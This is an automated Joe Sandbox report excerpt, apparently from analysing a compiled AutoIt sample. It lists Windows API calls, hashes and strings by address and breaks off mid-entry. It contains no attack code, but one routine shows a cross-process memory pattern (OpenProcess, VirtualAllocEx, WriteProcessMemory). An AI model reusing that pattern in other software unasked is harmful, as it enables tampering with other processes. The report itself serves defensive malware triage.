                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: 3913c002b3850fbe7f5553b566e404191e3dd67606bc58ef370318fa2a359676
                                                          • Instruction ID: 5e4ef1bbdfa599928f4c64ebc72b8767f138d1566b94a7d85bd93d55df1e8b92
                                                          • Opcode Fuzzy Hash: 3913c002b3850fbe7f5553b566e404191e3dd67606bc58ef370318fa2a359676
                                                          • Instruction Fuzzy Hash: 3F01A970600658BFDB214FA6DC48CAB7BACEF8A350B104A79F90CC2260DA318C06DA64
                                                          APIs
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?,?,003E7455), ref: 003E7127
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?), ref: 003E7142
                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?), ref: 003E7150
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?), ref: 003E7160
                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?), ref: 003E716C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: 338a6a1c56cdd1fb3bd1f4227502139312063e684dea6b4844af9c0bc3824787
                                                          • Instruction ID: 1d4887917e9a9856b86ac2d15432394cf8230436996f1c01d2e0050a3f6d945c
                                                          • Opcode Fuzzy Hash: 338a6a1c56cdd1fb3bd1f4227502139312063e684dea6b4844af9c0bc3824787
                                                          • Instruction Fuzzy Hash: D201DF72600328BBCB129F65DD44BEA7BACEF44791F114274FD08D2220E731DD029BA0
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F5260
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003F526E
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F5276
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003F5280
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F52BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: c399a4650fcbbecfb0793caf102c4187aa5df20d68915458c51125895c2b08c4
                                                          • Instruction ID: ee34b68a59f471ef4e4be883230c740ee5d14ead896733fc1b2d2425c78ccc74
                                                          • Opcode Fuzzy Hash: c399a4650fcbbecfb0793caf102c4187aa5df20d68915458c51125895c2b08c4
                                                          • Instruction Fuzzy Hash: F2015731D01A1DEBCF01EFE4E849AEDBB78BB08311F414A66EA41B2240CB30595487A9
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003E8121
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003E812B
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E813A
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003E8141
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E8157
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 35e80e65721d32746fa3802ae7bcc6fd693725feac13a6097bd2c964d07d88b3
                                                          • Instruction ID: 9b2eac143ee1b36086c5c37404e491452de5dc8526237b211f5fb3a4ee0eb198
                                                          • Opcode Fuzzy Hash: 35e80e65721d32746fa3802ae7bcc6fd693725feac13a6097bd2c964d07d88b3
                                                          • Instruction Fuzzy Hash: 6CF06275640318BFEB120FA5EC88EA73BACFF49754B004135F949D6190CB619D46EA60
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 003EC1F7
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 003EC20E
                                                          • MessageBeep.USER32(00000000), ref: 003EC226
                                                          • KillTimer.USER32(?,0000040A), ref: 003EC242
                                                          • EndDialog.USER32(?,00000001), ref: 003EC25C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: ec00f2c8caa2f3c72ca0b4765dbb64b9dd70210ab6884f2f24acb58f76bc12af
                                                          • Instruction ID: 24e59dc5ee9884a609783b69bfce8e7cd621c1214d0ce02bbe47f95f83ec9a40
                                                          • Opcode Fuzzy Hash: ec00f2c8caa2f3c72ca0b4765dbb64b9dd70210ab6884f2f24acb58f76bc12af
                                                          • Instruction Fuzzy Hash: 6901A230514718ABEF255B65ED4EBDA77B8BB00B06F004669A642A14E0DBE0694A8B94
                                                          APIs
                                                          • EndPath.GDI32(?), ref: 003913BF
                                                          • StrokeAndFillPath.GDI32(?,?,003CB888,00000000,?), ref: 003913DB
                                                          • SelectObject.GDI32(?,00000000), ref: 003913EE
                                                          • DeleteObject.GDI32 ref: 00391401
                                                          • StrokePath.GDI32(?), ref: 0039141C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: 4fad2ec79e01892929800e7cf2404e4846764f383f01a643d48fee3a9a04e585
                                                          • Instruction ID: 53a0aa9b5bbee377f41a428eaf3b5fb967dc3e462ee6e15e9d42a5fc9050f173
                                                          • Opcode Fuzzy Hash: 4fad2ec79e01892929800e7cf2404e4846764f383f01a643d48fee3a9a04e585
                                                          • Instruction Fuzzy Hash: 8FF0CD30004B09EBDF126F16EC5C7A93FB4A715326F08C634E42A595F2C73189A6DF58
                                                          APIs
                                                            • Part of subcall function 003B0DB6: std::exception::exception.LIBCMT ref: 003B0DEC
                                                            • Part of subcall function 003B0DB6: __CxxThrowException@8.LIBCMT ref: 003B0E01
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                            • Part of subcall function 00397A51: _memmove.LIBCMT ref: 00397AAB
                                                          • __swprintf.LIBCMT ref: 003A2ECD
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 003A2D66
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 1943609520-557222456
                                                          • Opcode ID: 6878ff2e79cbe1fc3870ac3d0fa1122f3493144ac0dfb0ee132fe320c87381e7
                                                          • Instruction ID: d61e3a8f17e78d3c295783ae2db75c34d5e65d990a46f597c79ca965467c591c
                                                          • Opcode Fuzzy Hash: 6878ff2e79cbe1fc3870ac3d0fa1122f3493144ac0dfb0ee132fe320c87381e7
                                                          • Instruction Fuzzy Hash: 1F916E721182019FCB16EF28D886D6FB7A8EF96710F00491EF5959F2A1EB30ED44CB52
                                                          APIs
                                                            • Part of subcall function 00394750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00394743,?,?,003937AE,?), ref: 00394770
                                                          • CoInitialize.OLE32(00000000), ref: 003FB9BB
                                                          • CoCreateInstance.OLE32(00422D6C,00000000,00000001,00422BDC,?), ref: 003FB9D4
                                                          • CoUninitialize.OLE32 ref: 003FB9F1
                                                            • Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
                                                            • Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                          • String ID: .lnk
                                                          • API String ID: 2126378814-24824748
                                                          • Opcode ID: c67ecde10baa8ebde25b66f3da4c901e8b6dbaba56bd6ef325755b773ef0f81d
                                                          • Instruction ID: 25572a68af8b2a496a36320fb472da8243c732384ecf6a3142b9e486dfa24009
                                                          • Opcode Fuzzy Hash: c67ecde10baa8ebde25b66f3da4c901e8b6dbaba56bd6ef325755b773ef0f81d
                                                          • Instruction Fuzzy Hash: B4A153756042059FCB01EF14C880E2ABBE5FF89314F15899DF9999B3A1CB31EC46CB91
                                                          APIs
                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 003EB4BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ContainedObject
                                                          • String ID: AutoIt3GUI$Container$%B
                                                          • API String ID: 3565006973-1790175466
                                                          • Opcode ID: 3e412fb80122e5c65fb4d68e40874a6ccbd5f1e83056586425b607c16178249f
                                                          • Instruction ID: ecebba2c73d3fe4e7d8cd24984593cfe52af693e569a68727f5b9ffd7d2d4547
                                                          • Opcode Fuzzy Hash: 3e412fb80122e5c65fb4d68e40874a6ccbd5f1e83056586425b607c16178249f
                                                          • Instruction Fuzzy Hash: 3B915970200611AFDB16DF65C885B6BBBE9FF49700F20866EE94ACB6D1DB70E841CB50
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 003B50AD
                                                            • Part of subcall function 003C00F0: __87except.LIBCMT ref: 003C012B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: cd10dd50b7a1ca53286419a517f45df94b31e9ceac96ae6ac60fcd5b334df76e
                                                          • Instruction ID: f73823036a2bdbdcd07ba0e3f82c3b4a6b4147784c95bdff216aa5b2f9c2209b
                                                          • Opcode Fuzzy Hash: cd10dd50b7a1ca53286419a517f45df94b31e9ceac96ae6ac60fcd5b334df76e
                                                          • Instruction Fuzzy Hash: F351AE71A0C641C7DB2B7B28CC057BE6B949B00304F248D6CE5D5C66A9DF348DC49B86
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: 3c:$_:
                                                          • API String ID: 4104443479-3871541621
                                                          • Opcode ID: 9593f89ad1dc3fb63e64fca9b11527de383902625603f6386bb6b8a8aa45f412
                                                          • Instruction ID: 51718ed55be209007000ec610ef662e045772240c434bf3d9f088cb014dc70db
                                                          • Opcode Fuzzy Hash: 9593f89ad1dc3fb63e64fca9b11527de383902625603f6386bb6b8a8aa45f412
                                                          • Instruction Fuzzy Hash: F4519D719006099FCB26CF68D880AAEBBB5FF45304F14852AE85AD7350EB30F965CB51
                                                          APIs
                                                            • Part of subcall function 003F14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003E9296,?,?,00000034,00000800,?,00000034), ref: 003F14E6
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003E983F
                                                            • Part of subcall function 003F1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003E92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003F14B1
                                                            • Part of subcall function 003F13DE: GetWindowThreadProcessId.USER32(?,?), ref: 003F1409
                                                            • Part of subcall function 003F13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003E925A,00000034,?,?,00001004,00000000,00000000), ref: 003F1419
                                                            • Part of subcall function 003F13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003E925A,00000034,?,?,00001004,00000000,00000000), ref: 003F142F
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003E98AC
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003E98F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: ffc130c73542df9637efe321cfcf2b0f26f69cb636ff28ad9ae651c6dd965c51
                                                          • Instruction ID: bcecf5f7d89ae191e3801ca1ab627d3565d1fce892a0a3473cae33c32c8a3d14
                                                          • Opcode Fuzzy Hash: ffc130c73542df9637efe321cfcf2b0f26f69cb636ff28ad9ae651c6dd965c51
                                                          • Instruction Fuzzy Hash: 9F416F7690021CBFCB11DFA5CD81BEEBBB8EB49300F004199FA45BB191DA706E45CBA0
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0041F910,00000000,?,?,?,?), ref: 004179DF
                                                          • GetWindowLongW.USER32 ref: 004179FC
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00417A0C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: 9ef118b8dd6b4986793907ac4dea44b053336fe6f0c3df4b69d260c7f1510c37
                                                          • Instruction ID: 3f632e6daf7bf5baa771e9f7c6b17a13b712b3a88e1baa8b1c7fe9de89e96513
                                                          • Opcode Fuzzy Hash: 9ef118b8dd6b4986793907ac4dea44b053336fe6f0c3df4b69d260c7f1510c37
                                                          • Instruction Fuzzy Hash: B231CE71204606ABEF118E38CC41BEB77A9EF09364F248726F875A22E1D734E9958B54
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00417461
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00417475
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00417499
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: fb30d1de9b1505a23db873c26498464622f281e8417e1a2fcec3f702d428b652
                                                          • Instruction ID: 730e1f70d5ad4ecec0c8d452334328405d47823fd1057cc1aa820a580e721833
                                                          • Opcode Fuzzy Hash: fb30d1de9b1505a23db873c26498464622f281e8417e1a2fcec3f702d428b652
                                                          • Instruction Fuzzy Hash: F421BF32500218BBDF11CF64CC42FEB3B79EB48724F110215FE15AB190DA79AC919BA4
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00417C4A
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00417C58
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00417C5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: 82dc8e05fb1755c440ead6f584518d9c619b42791dad78bb406fc086b8bb6429
                                                          • Instruction ID: 0569ca9ad7e0f134e9d751a90752a40bbdb4b388ef16f92fdcd32784b06a12e2
                                                          • Opcode Fuzzy Hash: 82dc8e05fb1755c440ead6f584518d9c619b42791dad78bb406fc086b8bb6429
                                                          • Instruction Fuzzy Hash: 18217CB5204208AFDB11DF24DCC1DB737ACEB49398B14405AFA059B3A1DB35EC528BA4
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00416D3B
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00416D4B
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00416D70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: 138bfcf5144841fcbd738b73a6fbe02e3816d9a59c373679d48eca09f5206685
                                                          • Instruction ID: b5c6832278d5cf6ba0cbd7ccff4206f6627372ee490fc906ffaa2b8fbf2868d6
                                                          • Opcode Fuzzy Hash: 138bfcf5144841fcbd738b73a6fbe02e3816d9a59c373679d48eca09f5206685
                                                          • Instruction Fuzzy Hash: 9C21B032600118BFEF118F54DC45EFB3BBAEB89764F028129F9459B2A0C675DC9297A4
                                                          APIs
                                                          • __snwprintf.LIBCMT ref: 00403A66
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                          Strings
                                                          Memory Dump Source
